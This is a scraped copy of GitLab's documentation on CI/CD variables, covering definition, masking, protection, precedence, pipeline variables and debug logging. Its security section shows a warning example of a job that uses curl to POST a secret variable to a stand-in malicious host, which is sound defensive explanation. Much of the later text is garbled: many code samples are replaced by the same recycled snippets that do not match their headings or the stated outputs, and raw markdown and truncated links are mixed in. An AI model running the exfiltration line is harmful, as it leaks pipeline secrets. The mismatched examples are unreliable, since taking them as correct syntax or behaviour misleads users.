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GitLab CI/CD variables

  • Tier: Free, Premium, Ultimate
  • Offering:, GitLab Self-Managed, GitLab Dedicated

CI/CD variables are a type of environment variable. You can use them to:

  • Control the behavior of jobs and pipelines.
  • Store values you want to re-use.
  • Avoid hard-coding values in your .gitlab-ci.yml file.

You can override variable values for a specific pipeline when you run a pipeline manually, run a manual job, or have them prefilled in manual pipelines.

Variable names are limited by the shell the runner uses to execute scripts. Each shell has its own set of reserved variable names.

To ensure consistent behavior, you should always put variable values in single or double quotes. Variables are internally parsed by the Psych YAML parser, so quoted and unquoted variables might be parsed differently. For example, VAR1: 012345 is interpreted as an octal value, so the value becomes 5349, but VAR1: "012345" is parsed as a string with a value of 012345.

For more information about advanced use of GitLab CI/CD, see 7 advanced GitLab CI workflow hacks shared by GitLab engineers.

Predefined CI/CD variables

GitLab CI/CD makes a set of predefined CI/CD variables available for use in pipeline configuration and job scripts. These variables contain information about the job, pipeline, and other values you might need when the pipeline is triggered or running.

You can use predefined CI/CD variables in your .gitlab-ci.yml without declaring them first. For example:

  stage: test
    - echo "The job's stage is '$CI_JOB_STAGE'"

The script in this example outputs The job's stage is 'test'.

Define a CI/CD variable in the .gitlab-ci.yml file

To create a CI/CD variable in the .gitlab-ci.yml file, define the variable and value with the variables keyword.

Variables saved in the .gitlab-ci.yml file are visible to all users with access to the repository, and should store only non-sensitive project configuration. For example, the URL of a database saved in a DATABASE_URL variable. Sensitive variables containing values like secrets or keys should be added in the UI.

You can define variables in:

  • A job: The variable is only available in that job's script, before_script, or after_script sections, and with some job keywords.
  • The top-level of the .gitlab-ci.yml file: The variable is available as a default for all jobs in a pipeline, unless a job defines a variable with the same name. The job's variable takes precedence.

In both cases, you cannot use these variables with global keywords.

For example:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

In this example:

  • job1 outputs: Variables are 'A default variable' and 'Job 1 variable'
  • job2 outputs: Variables are 'Different value than default', 'Job 2 variable', and ''

Use the value and description keywords to define variables that are prefilled for manually-triggered pipelines.

Skip default variables in a single job

If you don't want default variables to be available in a job, set variables to {}:

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

Define a CI/CD variable in the UI

Sensitive variables like tokens or passwords should be stored in the settings in the UI, not in the .gitlab-ci.yml file. Add CI/CD variables in the UI:

Alternatively, these variables can be added by using the API:

By default, pipelines from forked projects can't access the CI/CD variables available to the parent project. If you run a merge request pipeline in the parent project for a merge request from a fork, all variables become available to the pipeline.

For a project

Version history

  • Introduced in GitLab 15.7, projects can have a maximum of 200 CI/CD variables.
  • Updated in GitLab 15.9, projects can have a maximum of 8000 CI/CD variables.

You can add CI/CD variables to a project's settings.


  • You must be a project member with the Maintainer role.

To add or update variables in the project settings:

  1. On the left sidebar, select Search or go to and find your project.
  2. Select Settings > CI/CD.
  3. Expand Variables.
  4. Select Add variable and fill in the details:
    • Key: Must be one line, with no spaces, using only letters, numbers, or _.
    • Value: No limitations.
    • Type: Variable (default) or File.
    • Environment scope: Optional. All (default) (*), a specific environment, or a wildcard environment scope.
    • Protect variable Optional. If selected, the variable is only available in pipelines that run on protected branches or protected tags.
    • Visibility: Select Visible (default), Masked, or Masked and hidden (only available for new variables).

After you create a variable, you can use it in the pipeline configuration or in job scripts.

For a group

Version history

  • Introduced in GitLab 15.7, groups can have a maximum of 200 CI/CD variables.
  • Updated in GitLab 15.9, groups can have a maximum of 30000 CI/CD variables.

You can make a CI/CD variable available to all projects in a group.


  • You must be a group member with the Owner role.

To add a group variable:

  1. On the left sidebar, select Search or go to and find your group.
  2. Select Settings > CI/CD.
  3. Expand Variables.
  4. Select Add variable and fill in the details:
    • Key: Must be one line, with no spaces, using only letters, numbers, or _.
    • Value: No limitations.
    • Type: Variable (default) or File.
    • Protect variable Optional. If selected, the variable is only available in pipelines that run on protected branches or protected tags.
    • Visibility: Select Visible (default), Masked, or Masked and hidden (only available for new variables).

The group variables that are available in a project are listed in the project's Settings > CI/CD > Variables section. Variables from subgroups are recursively inherited.

Environment scope

  • Tier: Premium, Ultimate

To set a group CI/CD variable to only be available for certain environments:

  1. On the left sidebar, select Search or go to and find your group.
  2. Select Settings > CI/CD.
  3. Expand Variables.
  4. To the right of the variable, select Edit ({pencil}).
  5. For Environment scope, select All (default) (*), a specific environment, or a wildcard environment scope.

For an instance

  • Tier: Free, Premium, Ultimate
  • Offering: GitLab Self-Managed, GitLab Dedicated

You can make a CI/CD variable available to all projects and groups in a GitLab instance.


  • You must have administrator access to the instance.

To add an instance variable:

  1. On the left sidebar, at the bottom, select Admin.
  2. Select Settings > CI/CD.
  3. Expand Variables.
  4. Select Add variable and fill in the details:
    • Key: Must be one line, with no spaces, using only letters, numbers, or _.
    • Value: The value is limited to 10,000 characters, but also bounded by any limits in the runner's operating system.
    • Type: Variable (default) or File.
    • Protect variable Optional. If selected, the variable is only available in pipelines that run on protected branches or protected tags.
    • Visibility: Select Visible (default), Masked, or Masked and hidden (only available for new variables).

CI/CD variable security

Code pushed to the .gitlab-ci.yml file could compromise your variables. Variables could be accidentally exposed in a job log, or maliciously sent to a third party server.

Review all merge requests that introduce changes to the .gitlab-ci.yml file before you:

Review the .gitlab-ci.yml file of imported projects before you add files or run pipelines against them.

The following example shows malicious code in a .gitlab-ci.yml file:

  script:                                         # Password exposed accidentally
    - echo "This script logs into the DB with $USER $PASSWORD"
    - db-login $USER $PASSWORD

  script:                                         # Secret exposed maliciously
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"

To help reduce the risk of accidentally leaking secrets through scripts like in accidental-leak-job, all variables containing sensitive information should always be masked in job logs. You can also limit a variable to protected branches and tags only.

Alternatively, use one of the native GitLab integrations to connect with third party secrets manager providers to store and retrieve secrets:

You can also use OpenID Connect (OIDC) authentication for secrets managers which do not have a native integration.

Malicious scripts like in malicious-job must be caught during the review process. Reviewers should never trigger a pipeline when they find code like this, because malicious code can compromise both masked and protected variables.

Variable values are encrypted using aes-256-cbc and stored in the database. This data can only be read and decrypted with a valid secrets file.

Mask a CI/CD variable

Masking a CI/CD variable is not a guaranteed way to prevent malicious users from accessing variable values. To ensure security of sensitive information, consider using external secrets and file type variables to prevent commands such as env/printenv from printing secret variables.

You can mask a project, group, or instance CI/CD variable so the value of the variable does not display in job logs. When a masked CI/CD variable would be displayed in a job log, the value is replaced with [masked] to prevent the value from being exposed.


To mask a variable:

  1. For the group, project, or in the Admin area, select Settings > CI/CD.
  2. Expand Variables.
  3. Next to the variable you want to protect, select Edit.
  4. Under Visibility, select Mask variable.
  5. Select Update variable.

The method used to mask variables limits what can be included in a masked variable. The value of the variable must:

  • Be a single line with no spaces.
  • Be 8 characters or longer.
  • Not match the name of an existing predefined or custom CI/CD variable.
  • Not include non-alphanumeric characters other than @, _, -, :, or +.

Additionally, if variable expansion is enabled, the value can contain only:

  • Characters from the Base64 alphabet (RFC4648).
  • The @, :, ., or ~ characters.

Masking a variable automatically masks the value anywhere in a job log. If another variable has the same value, that value is also masked, including when a variable references a masked variable. The string [MASKED] is shown instead of the value, possibly with some trailing x characters.

Different versions of GitLab Runner have different masking limitations:

Version Limitations
v14.1.0 and earlier Masking of large secrets (greater than 4 KiB) could potentially be revealed. No sensitive URL parameter masking.
v14.2.0 to v15.3.0 The tail of a large secret (greater than 4 KiB) could potentially be revealed. No sensitive URL parameter masking.
v15.7.0 and later Secrets could be revealed when CI_DEBUG_SERVICES is enabled. For details, read about service container logging.

Hide a CI/CD variable

Version history

In addition to masking, you can also prevent the value of CI/CD variables from being revealed in the CI/CD settings page. Hiding a variable is only possible when creating a new variable, you cannot update an existing variable to be hidden.


To hide a variable, select Masked and hidden in the Visibility section when you add a new CI/CD variable in the UI. After you save the variable, the variable can be used in CI/CD pipelines, but cannot be revealed in the UI again.

Protect a CI/CD variable

You can configure a project, group, or instance CI/CD variable to be available only to pipelines that run on protected branches or protected tags.

Merged results pipelines and merge request pipelines do not have access to these variables.


To set a variable as protected:

  1. For the project or group, go to Settings > CI/CD.
  2. Expand Variables.
  3. Next to the variable you want to protect, select Edit.
  4. Select the Protect variable checkbox.
  5. Select Update variable.

The variable is available for all subsequent pipelines.

Use file type CI/CD variables

All predefined CI/CD variables and variables defined in the .gitlab-ci.yml file are "variable" type (variable_type of env_var in the API). Variable type variables:

  • Consist of a key and value pair.
  • Are made available in jobs as environment variables, with:
    • The CI/CD variable key as the environment variable name.
    • The CI/CD variable value as the environment variable value.

Project, group, and instance CI/CD variables are "variable" type by default, but can optionally be set as a "file" type (variable_type of file in the API). File type variables:

  • Consist of a key, value, and file.
  • Are made available in jobs as environment variables, with:
    • The CI/CD variable key as the environment variable name.
    • The CI/CD variable value saved to a temporary file.
    • The path to the temporary file as the environment variable value.

Use file type CI/CD variables for tools that need a file as input. The AWS CLI and kubectl are both tools that use File type variables for configuration.

For example, if you are using kubectl with:

  • A variable with a key of KUBE_URL and as the value.
  • A file type variable with a key of KUBE_CA_PEM and a certificate as the value.

Pass KUBE_URL as a --server option, which accepts a variable, and pass $KUBE_CA_PEM as a --certificate-authority option, which accepts a path to a file:

kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"

Be careful when assigning the value of a file variable to another variable in GitLab 15.6 or older. The other variable takes the content of the file as its value, not the path to the file. In GitLab 15.7 and later, this behavior was fixed and the other variable now takes the path to the file as the value.

Use a .gitlab-ci.yml variable as a file type variable

You cannot set a CI/CD variable defined in the .gitlab-ci.yml file as a file type variable. If you have a tool that requires a file path as an input, but you want to use a variable defined in the .gitlab-ci.yml:

  • Run a command that saves the value of the variable in a file.
  • Use that file with your tool.

For example:

  SITE_URL: ""

    - echo "$SITE_URL" > "site-url.txt"
    - mytool --url-file="site-url.txt"

Use CI/CD variables in job scripts

All CI/CD variables are set as environment variables in the job's environment. You can use variables in job scripts with the standard formatting for each environment's shell.

To access environment variables, use the syntax for your runner executor's shell.

With Bash, sh and similar

To access environment variables in Bash, sh, and similar shells, prefix the CI/CD variable with ($):

    - echo "$CI_JOB_ID"

With PowerShell

To access variables in a Windows PowerShell environment, including environment variables set by the system, prefix the variable name with $env: or $:

    - echo $env:CI_JOB_ID
    - echo $CI_JOB_ID
    - echo $env:PATH

In some cases environment variables must be surrounded by quotes to expand properly:

    - D:\qislsf\apache-ant-1.10.5\bin\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test

With Windows Batch

To access CI/CD variables in Windows Batch, surround the variable with %:

    - echo %CI_JOB_ID%

You can also surround the variable with ! for delayed expansion. Delayed expansion might be needed for variables that contain white spaces or newlines:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

### In service containers

[Service containers](../docker/ can use CI/CD variables, but
by default can only access [variables saved in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
Variables [added in the GitLab UI](#define-a-cicd-variable-in-the-ui) are not available to
service containers, because service containers are not trusted by default.

To make a UI-defined variable available in a service container, you can re-assign
it to another variable in your `.gitlab-ci.yml`:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

The re-assigned variable cannot have the same name as the original variable. Otherwise it does not get expanded.

### Pass an environment variable to another job

You can create a new environment variable in a job, and pass it to another job
in a later stage. These variables cannot be used as CI/CD variables to configure a pipeline
(for example with the [`rules` keyword](../yaml/, but they can be used in job scripts.

To pass a job-created environment variable to other jobs:

1. In the job script, save the variable as a `.env` file.
   - The format of the file must be one variable definition per line.
   - Each line must be formatted as: `VARIABLE_NAME=ANY VALUE HERE`.
   - Values can be wrapped in quotes, but cannot contain newline characters.
1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/
1. Jobs in later stages can then [use the variable in scripts](#use-cicd-variables-in-job-scripts),
   unless [jobs are configured not to receive `dotenv` variables](#control-which-jobs-receive-dotenv-variables).

For example:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

Variables from `dotenv` reports [take precedence](#cicd-variable-precedence) over
certain types of new variable definitions such as job defined variables.

You can also [pass `dotenv` variables to downstream pipelines](../pipelines/

#### Control which jobs receive `dotenv` variables

You can use the [`dependencies`](../yaml/ or [`needs`](../yaml/
keywords to control which jobs receive the `dotenv` artifacts.

To have no environment variables from a `dotenv` artifact:

- Pass an empty `dependencies` or `needs` array.
- Pass [`needs:artifacts`](../yaml/ as `false`.
- Set `needs` to only list jobs that do not have a `dotenv` artifact.

For example:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

### Pass an environment variable from the `script` section to another section in the same job

Use `$GITLAB_ENV` to pass environment variables defined in the `script` section to another section.

For example:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

To also reference the variable in other stages, write the variable to both the `$GITLAB_ENV` and `.env` files:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

### Store multiple values in one variable

You cannot create a CI/CD variable that is an array of values, but you
can use shell scripting techniques for similar behavior.

For example, you can store multiple values separated by a space in a variable,
then loop through the values with a script:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

### As part of a string

You can use variables as part of a string. You can surround the variables with curly brackets (`{}`)
to help distinguish the variable name from the surrounding text. Without curly brackets,
the adjacent text is interpreted as part of the variable name. For example:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

## Use CI/CD variables in other variables

You can use variables inside other variables:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

### Use the `$` character in CI/CD variables

If you do not want the `$` character interpreted as the start of another variable,
use `$$` instead:

  ALL_JOBS_VAR: "A default variable"

    JOB1_VAR: "Job 1 variable"
    - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'"

    ALL_JOBS_VAR: "Different value than default"
    JOB2_VAR: "Job 2 variable"
    - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'"

### Prevent CI/CD variable expansion

#### Version history

- [Introduced]( in GitLab 15.7.

Expanded variables treat values with the `$` character as a reference to another variable.
CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings,
disable variable expansion for the variable


- You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).

To disable variable expansion for the variable:

1. For the project or group, go to **Settings > CI/CD**.
1. Expand **Variables**.
1. Next to the variable you want to do not want expanded, select **Edit**.
1. Clear the **Expand variable** checkbox.
1. Select **Update variable**.

## CI/CD variable precedence

### Version history

- Scan Execution Policies variable precedence was [changed]( in GitLab 16.7 [with a flag](../../administration/ named `security_policies_variables_precedence`. Enabled by default. [Feature flag removed in GitLab 16.8](

You can use CI/CD variables with the same name in different places, but the values
can overwrite each other. The type of variable and where they are defined determines
which variables take precedence.

The order of precedence for variables is (from highest to lowest):

1. [Pipeline execution policy variables](../../user/application_security/policies/
1. [Scan execution policy variables](../../user/application_security/policies/
1. [Pipeline variables](#use-pipeline-variables). These variables all have the same precedence:
   - [Variables passed to downstream pipelines](../pipelines/
   - [Trigger variables](../triggers/
   - [Scheduled pipeline variables](../pipelines/
   - [Manual pipeline run variables](../pipelines/
   - Variables added when [creating a pipeline with the API](../../api/
   - [Manual job variables](../jobs/
1. Project [variables](#for-a-project).
1. Group [variables](#for-a-group). If the same variable name exists in a
   group and its subgroups, the job uses the value from the closest subgroup. For example, if
   you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in
   `Subgroup 2` takes precedence.
1. Instance [variables](#for-an-instance).
1. [Variables from `dotenv` reports](#pass-an-environment-variable-to-another-job).
1. Job variables, defined in jobs in the `.gitlab-ci.yml` file.
1. Default variables for all jobs, defined at the top-level of the `.gitlab-ci.yml` file.
1. [Deployment variables](
1. [Predefined variables](

For example:

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs in the `.gitlab-ci.yml` file
have higher precedence than default variables.

## Use pipeline variables

Pipeline variables are variables that are specified when running a new pipeline.


- You must have the Developer role in the project.

You can specify a pipeline variable when you:

- [Run a pipeline manually](../pipelines/ in the UI.
- Create a pipeline by using [the `pipelines` API endpoint](../../api/
- Create a pipeline by using [the `triggers` API endpoint](../triggers/
- Use [push options](../../topics/git/
- Pass variables to a downstream pipeline by using either the [`variables` keyword](../pipelines/,
  [`trigger:forward` keyword](../yaml/ or [`dotenv` variables](../pipelines/
- Specify variables when creating a [pipeline schedule](../pipelines/
- Specify variables when [running a manual job](../pipelines/

These variables have [higher precedence](#cicd-variable-precedence) and can override
other defined variables, including [predefined variables](

You should avoid overriding predefined variables in most cases, as it can cause the pipeline to behave unexpectedly.

### Restrict pipeline variables

You can limit who can run pipelines with pipeline variables to specific user roles.
To limit the use of pipeline variables to only the Maintainer role and higher:

- Use [the projects API](../../api/ to enable the `restrict_user_defined_variables` setting.
  The setting is `disabled` by default.

When users with the Developer role or lower try to [use pipeline variables](#use-pipeline-variables),
they receive the `Insufficient permissions to set pipeline variables` error message.

If you [store your CI/CD configurations in a different repository](../pipelines/,
use this setting for control over the environment the pipeline runs in.

#### Set a minimum role for pipeline variables

##### Version history

- [Introduced]( in GitLab 17.1.
- For, setting defaults [updated for all new projects in new namespaces]( to `enabled` for `restrict_user_defined_variables` and `no_one_allowed` for `ci_pipeline_variables_minimum_override_role` in GitLab 17.7.


- You must have the Maintainer role in the project. If the minimum role was previously set to `owner`
  or `no_one_allowed`, then you must have the Owner role in the project.

To change the setting, use [the projects API](../../api/
to set `ci_pipeline_variables_minimum_override_role` to one of:

- `no_one_allowed`: No pipelines can run with pipeline variables.
  Default for new projects in new namespaces on
- `owner`: Only users with the Owner role can run pipelines with pipeline variables.
  You must have the Owner role for the project to change the setting to this value.
- `maintainer`: Only users with at least the Maintainer role can run pipelines with pipeline variables.
  Default when not specified on GitLab Self-Managed and GitLab Dedicated.
- `developer`: Only users with at least the Developer role can run pipelines with pipeline variables.

## Exporting variables

Scripts executed in separate shell contexts do not share exports, aliases,
local function definitions, or any other local shell updates.

This means that if a job fails, variables created by user-defined scripts are not

When runners execute jobs defined in `.gitlab-ci.yml`:

- Scripts specified in `before_script` and the main script are executed together in
  a single shell context, and are concatenated.
- Scripts specified in `after_script` run in a shell context completely separate to
  the `before_script` and the specified scripts.

Regardless of the shell the scripts are executed in, the runner output includes:

- Predefined variables.
- Variables defined in:
  - Instance, group, or project CI/CD settings.
  - The `.gitlab-ci.yml` file in the `variables:` section.
  - The `.gitlab-ci.yml` file in the `secrets:` section.
  - The `config.toml`.

The runner cannot handle manual exports, shell aliases, and functions executed in the body of the script, like `export MY_VARIABLE=1`.

For example, in the following `.gitlab-ci.yml` file, the following scripts are defined:

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

When the runner executes the job:

1. `before_script` is executed:
   1. Prints to the output.
   1. Defines the variable for `MY_VARIABLE`.
1. `script` is executed:
   1. Prints to the output.
   1. Prints the value of `JOB_DEFINED_VARIABLE`.
   1. Prints the value of `CI_COMMIT_SHA`.
   1. Prints the value of `MY_VARIABLE`.
1. `after_script` is executed in a new, separate shell context:
   1. Prints to the output.
   1. Prints the value of `JOB_DEFINED_VARIABLE`.
   1. Prints the value of `CI_COMMIT_SHA`.
   1. Prints an empty value of `MY_VARIABLE`. The variable value cannot be detected because `after_script` is in a separate shell context to `before_script`.

## Related topics

- You can configure [Auto DevOps](../../topics/autodevops/ to pass CI/CD variables
  to a running application. To make a CI/CD variable available as an environment variable in the running application's container,
  [prefix the variable key](../../topics/autodevops/
  with `K8S_SECRET_`.

- The [Managing the Complex Configuration Data Management Monster Using GitLab](
  video is a walkthrough of the [Complex Configuration Data Monorepo](
  working example project. It explains how multiple levels of group CI/CD variables
  can be combined with environment-scoped project variables for complex configuration
  of application builds or deployments.

  The example can be copied to your own group or instance for testing. More details
  on what other GitLab CI patterns are demonstrated are available at the project page.

- You can [pass CI/CD variables to downstream pipelines](../pipelines/
  Use [`trigger:forward` keyword](../yaml/ to specify what type of variables
  to pass to the downstream pipeline.

## Troubleshooting

### List all variables

You can list all variables available to a script with the `export` command
in Bash or `dir env:` in PowerShell. This exposes the values of **all** available
variables, which can be a [security risk](#cicd-variable-security).
[Masked variables](#mask-a-cicd-variable) display as `[MASKED]`.

For example, with Bash:

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

Example job log output (truncated):

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

### Enable debug logging

Debug logging can be a serious security risk. The output contains the content of
all variables available to the job. The output is uploaded to the
GitLab server and visible in job logs.

You can use debug logging to help troubleshoot problems with pipeline configuration
or job scripts. Debug logging exposes job execution details that are usually hidden
by the runner and makes job logs more verbose. It also exposes all variables and secrets
available to the job.

Before you enable debug logging, make sure only team members
can view job logs. You should also [delete job logs](../jobs/
with debug output before you make logs public again.

To enable debug logging, set the `CI_DEBUG_TRACE` variable to `true`:

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

Example output (truncated):

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables

#### Access to debug logging

Access to debug logging is restricted to [users with at least the Developer role](../../user/ Users with a lower role cannot see the logs when debug logging is enabled with a variable in:

- The [`.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
- The CI/CD variables set in the GitLab UI.

If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible
to all users with access to job logs. The permission levels are not checked by the runner,
so you should only use the variable in GitLab itself.

### "argument list too long"

This issue occurs when the combined length of all CI/CD variables defined for a job exceeds the limit imposed by the
shell where the job executes. This includes the names and values of pre-defined and user defined variables. This limit
is typically referred to as `ARG_MAX`, and is shell and operating system dependent. This issue also occurs when the
content of a single [File-type](#use-file-type-cicd-variables) variable exceeds `ARG_MAX`.

For more information, see [issue 392406](

As a workaround you can either:

- Use [File-type](#use-file-type-cicd-variables) CI/CD variables for large environment variables where possible.
- If a single large variable is larger than `ARG_MAX`, try using [Secure Files](../secure_files/, or
  bring the file to the job through some other mechanism.

### Default variable doesn't expand in job variable of the same name

You cannot use a default variable's value in a job variable of the same name. A default variable
is only made available to a job when the job does not have a variable defined with the same name.
If the job has a variable with the same name, the job's variable takes precedence
and the default variable is not available in the job.

For example, these two samples are equivalent:

- In this sample, `$MY_VAR` has no value because it's not defined anywhere:

      MY_VAR: $MY_VAR
    script: echo "Value is '$MY_VAR'"
  • In this sample, $MY_VAR has no value because the default variable with the same name is not available in the job:

      MY_VAR: "Default value"
        MY_VAR: $MY_VAR
      script: echo "Value is '$MY_VAR'"

In both cases, the echo command outputs Value is '$MY_VAR'.

In general, you should use the default variable directly in a job rather than reassigning its value to a new variable. If you need to do this, use variables with different names instead. For example:

  DEFAULT_VAR: "A default variable"

  variables: {}
    - echo This job does not need any variables